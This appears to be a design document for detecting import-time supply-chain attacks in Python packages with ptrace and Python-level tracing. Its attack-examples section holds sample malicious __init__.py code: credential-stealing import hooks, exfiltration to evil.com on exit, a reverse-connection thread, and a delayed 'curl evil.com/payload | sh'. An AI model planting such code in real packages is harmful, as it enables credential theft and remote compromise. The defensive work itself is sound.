# Import-Time Attestation Design

## The Problem
Install-time ptrace captures what happens while `pip install` runs. Sophisticated
malware can keep `setup.py` clean: the payload lives in `__init__.py` and triggers
only on `import`. Examples of load-time payloads: event-stream (npm, 2018), Lazarus (2025-2026).

Our current attestation is blind to this entire class of attack.

## Approaches

### Option A: Two-Phase Entrypoint (simplest)
Modify the entrypoint to do BOTH install and import as separate traced commands:

```bash
# Phase 1: Install (current)
cilock run --step pip-install --trace -- pip install <package>

# Phase 2: Import (NEW)
cilock run --step pip-import --trace -- python3 -c "import <package>"
```

Two separate attestations. Cross-attestation policy compares them:
- New network connections on import that weren't during install = suspicious
- New file accesses on import = suspicious
- New processes spawned on import = suspicious

**Pros:** Simple to implement. Uses existing infrastructure.
**Cons:** Two attestation envelopes per package. Only catches top-level import.
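
The cross-attestation comparison above could be sketched roughly as follows. This is a minimal sketch, not the policy engine: `TraceSummary`, `import_only_activity`, and `is_suspicious` are hypothetical names, and it assumes each attestation has already been flattened into sets of connections, file paths, and spawned programs.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class TraceSummary:
    """Hypothetical flattened view of one traced step (not the real envelope schema)."""
    connections: frozenset = field(default_factory=frozenset)  # e.g. "203.0.113.5:4444"
    files: frozenset = field(default_factory=frozenset)        # paths opened
    processes: frozenset = field(default_factory=frozenset)    # programs executed


def import_only_activity(install: TraceSummary, imp: TraceSummary) -> dict:
    """Return activity observed during import that was not observed during install."""
    return {
        "connections": sorted(imp.connections - install.connections),
        "files": sorted(imp.files - install.files),
        "processes": sorted(imp.processes - install.processes),
    }


def is_suspicious(findings: dict) -> bool:
    # Any non-empty category counts as a finding in this sketch.
    return any(findings.values())
```

In practice the file category would probably need an allow-list (for example the package's own files and `__pycache__` writes), which is not shown here.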

### Option B: Custom Import Attestor (cleanest)
New Rookery attestor plugin that runs in PostProductRunType:

```go
type ImportAttestation struct {
    Package       string        `json:"package"`
    ImportSuccess bool          `json:"importSuccess"`
    ImportError   string        `json:"importError,omitempty"`
    Processes     []ProcessInfo `json:"processes,omitempty"`
    // Reuses ProcessInfo from commandrun — same structure
    // with openedfiles, network, fileOps, syscallEvents
}
```

The attestor:
1. Determines what package was installed (from pip-install attestor data)
2. Spawns `python3 -c "import <package>"` as a child process
3. Attaches ptrace to trace the import execution
4. Records all syscalls (file opens, network, subprocesses)
5. Returns the data as an attestation

**Pros:** Single attestation envelope. Clean integration. Same trace infrastructure.
**Cons:** Significant development effort. Need to extract ptrace logic into reusable lib.
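
Step 2 and the `importSuccess` / `importError` fields can be illustrated without the ptrace part. The sketch below is in Python for brevity (the attestor itself would be Go), `probe_import` is a hypothetical helper, and the name check is an added assumption to keep a hostile package name from being interpolated into `-c` as code.

```python
import subprocess
import sys


def probe_import(module: str, timeout: float = 60.0) -> dict:
    """Import `module` in a fresh interpreter and report the outcome."""
    # Reject anything that is not a dotted identifier before building the -c string.
    if not all(part.isidentifier() for part in module.split(".")):
        raise ValueError(f"not a valid module name: {module!r}")
    try:
        proc = subprocess.run(
            [sys.executable, "-c", f"import {module}"],
            capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return {"package": module, "importSuccess": False, "importError": "timeout"}
    result = {"package": module, "importSuccess": proc.returncode == 0}
    if proc.returncode != 0:
        # Keep only the last stderr line, typically the exception summary.
        lines = proc.stderr.strip().splitlines()
        result["importError"] = lines[-1] if lines else f"exit code {proc.returncode}"
    return result
```

The keys mirror the JSON tags of `ImportAttestation`; the process and syscall data would still have to come from the tracer.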

### Option C: Extend pip-install Attestor (pragmatic)
Add import-time analysis to the existing pip-install attestor:

```go
type ImportAnalysis struct {
    Package         string   `json:"package"`
    ImportSuccess   bool     `json:"importSuccess"`
    ImportError     string   `json:"importError,omitempty"`
    FilesAccessed   []string `json:"filesAccessed,omitempty"`
    NetworkCalls    int      `json:"networkCalls"`
    SubprocessCalls int      `json:"subprocessCalls"`
    SuspiciousOps   []string `json:"suspiciousOps,omitempty"`
}
```

After install, run a Python script that:
1. Traces the import using Python's `sys.settrace` and `sys.setprofile`
2. Hooks `socket.socket`, `subprocess.Popen`, `os.system` at Python level
3. Monitors `sys.meta_path` changes, `codecs.register` calls
4. Records what happened during import

**Pros:** Python-level visibility (sees things ptrace can't, such as codec registration).
**Cons:** Can be evaded by C extensions. Not as comprehensive as ptrace.
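
One possible shape for the hooks listed above is sketched here. Note the swap: instead of monkey-patching `socket.socket`, `subprocess.Popen`, and `os.system`, it uses `sys.addaudithook` (PEP 578, Python 3.8+) and the documented `socket.connect`, `subprocess.Popen`, and `os.system` audit events, which avoids breaking code that subclasses the patched classes. `codecs.register` and `atexit.register` are wrapped directly. `ImportRecorder` and `WATCHED` are hypothetical names.

```python
import atexit
import codecs
import contextlib
import sys

# Audit event names as listed in CPython's audit events table.
WATCHED = {"socket.connect", "subprocess.Popen", "os.system"}


class ImportRecorder:
    def __init__(self):
        self.events = []
        self.active = False
        # Audit hooks cannot be removed, so the hook is gated by `self.active`.
        sys.addaudithook(self._on_audit)

    def _on_audit(self, event, args):
        if self.active and event in WATCHED:
            self.events.append((event, repr(args)))

    def _wrap(self, label, func):
        def wrapper(*args, **kwargs):
            self.events.append((label, repr(args)))
            return func(*args, **kwargs)
        return wrapper

    @contextlib.contextmanager
    def recording(self):
        """Record watched audit events and codecs/atexit registrations."""
        saved = (codecs.register, atexit.register)
        codecs.register = self._wrap("codecs.register", saved[0])
        atexit.register = self._wrap("atexit.register", saved[1])
        self.active = True
        try:
            yield self.events
        finally:
            self.active = False
            codecs.register, atexit.register = saved
```

The import under test would run inside `with recorder.recording():`. A C extension that calls libc directly raises no audit event, so the evasion caveat above still applies.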

### Option D: Hybrid (recommended)
Combine A and C:

1. **Phase 1:** `cilock run --trace -- pip install <package>` (install attestation)
2. **Phase 2:** `cilock run --trace -- python3 /pip-witness/import_tracer.py <package>` (import attestation)

Where `import_tracer.py` does:
```python
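import importlib
import json
import sys

package_name = sys.argv[1]  # module to import, passed on the command line

# Snapshot Python-level state BEFORE the import
original_meta_path = list(sys.meta_path)
original_modules = set(sys.modules)

# Import the package and record the outcome
error = None
try:
    importlib.import_module(package_name)
except Exception as e:
    error = f"{type(e).__name__}: {e}"

# After import, check what changed
new_meta_path = [repr(x) for x in sys.meta_path if x not in original_meta_path]
new_modules = sorted(set(sys.modules) - original_modules)

# Report findings as JSON on stdout (field names are illustrative)
# (ptrace captures syscalls, this script captures Python-level changes)
json.dump({
    "package": package_name,
    "importSuccess": error is None,
    "importError": error,
    "newMetaPath": new_meta_path,
    "newModules": new_modules,
}, sys.stdout, indent=2)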
```

The import runs inside ptrace (via cilock run), so we get BOTH:
- Syscall-level trace (network, files, processes)
- Python-level analysis (import hooks, codecs, atexit handlers)

## What Import-Time Attacks Look Like

### 1. sys.meta_path Hook
```python
# __init__.py
import sys
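class EvilFinder:
    # find_spec is the meta path hook; legacy find_module is ignored on Python 3.12+
    def find_spec(self, name, path=None, target=None):
        # Runs on every later import that is not already cached in sys.modules
        steal_credentials()  # placeholder for the payload
        return None  # defer to the real finders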
sys.meta_path.insert(0, EvilFinder())
```
**ptrace sees:** Nothing unusual (no syscalls beyond normal module loading)
**Python tracer sees:** sys.meta_path changed

### 2. atexit Handler
```python
# __init__.py
import atexit
def exfiltrate_on_exit():
    import urllib.request
    urllib.request.urlopen("https://evil.com/?" + steal_env())
atexit.register(exfiltrate_on_exit)
```
**ptrace sees:** Nothing at import time. The exfil runs when Python exits, so it shows up in the trace only if tracing continues through interpreter shutdown.
**Python tracer sees:** atexit.register called

### 3. Background Thread
```python
# __init__.py
import threading
def background_c2():
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("evil.com", 4444))
    # ... RAT logic
t = threading.Thread(target=background_c2, daemon=True)
t.start()
```
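**ptrace sees:** `socket` + `connect` to the resolved address of evil.com, provided the tracer follows threads and the process lives long enough for the daemon thread to run (daemon threads are killed when the interpreter exits).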
**Python tracer sees:** threading.Thread started
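
One way the Python tracer could notice a thread like the one above is to snapshot `threading.enumerate()` around the import. This is a minimal sketch with a hypothetical helper name; it misses threads that finish before the second snapshot and threads created outside the `threading` module.

```python
import importlib
import threading


def threads_started_by_import(module_name: str) -> list:
    """Import `module_name` and list threads alive afterwards that were not alive before."""
    before = {t.ident for t in threading.enumerate()}
    importlib.import_module(module_name)
    return [
        {"name": t.name, "daemon": t.daemon}
        for t in threading.enumerate()
        if t.ident not in before
    ]
```

A non-empty result for a package that has no reason to start threads at import would be worth surfacing next to the syscall trace.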

### 4. Delayed Activation
```python
# __init__.py
import time, os
if int(time.time()) > 1775000000:  # 2026-03-31 23:33:20 UTC, i.e. from April 2026 on
    os.system("curl evil.com/payload | sh")
```
**ptrace sees:** Nothing (if scanned before activation date)
**Python tracer sees:** time.time() call + conditional (hard to detect)

## Feasibility Assessment

| Approach | Effort | Coverage | Evasion Resistance |
|----------|--------|----------|-------------------|
| A: Two-phase entrypoint | Low (1 day) | Good for syscall-visible attacks | Low (delayed activation and Python-level hooks evade) |
| B: Custom attestor | High (1 week) | Best | Medium |
| C: Python-level hooks | Medium (2-3 days) | Best for Python attacks | Low (C extensions can evade) |
| D: Hybrid A+C | Medium (2-3 days) | Best overall | Medium |

## Recommendation

Start with **Option A** (two-phase entrypoint): it adds a single traced command to
the entrypoint and gives us immediate import-time visibility via ptrace. Then layer
on **Option C** (Python-level hooks) for the things ptrace can't see. Together these
make up the hybrid Option D.

The entrypoint change:
```bash
# After pip install completes...
cilock run \
    --step pip-import \
    --trace \
    --signer-file-key-path /etc/pip-witness/signing-key.pem \
    --outfile /attestations/${STEP_NAME}-import.json \
    -- python3 -c "import ${PACKAGE_NAME}"
```
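
One caveat with `import ${PACKAGE_NAME}`: the distribution name passed to `pip install` is not always the importable module name (for example `beautifulsoup4` installs `bs4`). A minimal sketch of resolving import names with the standard-library `importlib.metadata` follows; `import_names` is a hypothetical helper, `top_level.txt` is only present for some builds, and the fallback ignores single-file extension modules.

```python
from importlib import metadata


def import_names(distribution: str) -> list:
    """Best-effort list of top-level importable names for an installed distribution."""
    dist = metadata.distribution(distribution)  # raises PackageNotFoundError if absent
    top_level = dist.read_text("top_level.txt")
    if top_level:
        return sorted(line.strip() for line in top_level.splitlines() if line.strip())
    # Fallback: infer names from the recorded file list (may be None for some installs).
    names = set()
    for path in dist.files or []:
        first = path.parts[0]
        if first.endswith((".dist-info", ".egg-info")) or first in ("..", "__pycache__"):
            continue
        if len(path.parts) == 1:
            if path.suffix == ".py":
                names.add(path.stem)
        else:
            names.add(first)
    return sorted(names)
```

Each returned name could then be imported in its own traced step, rather than assuming the distribution name is importable.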
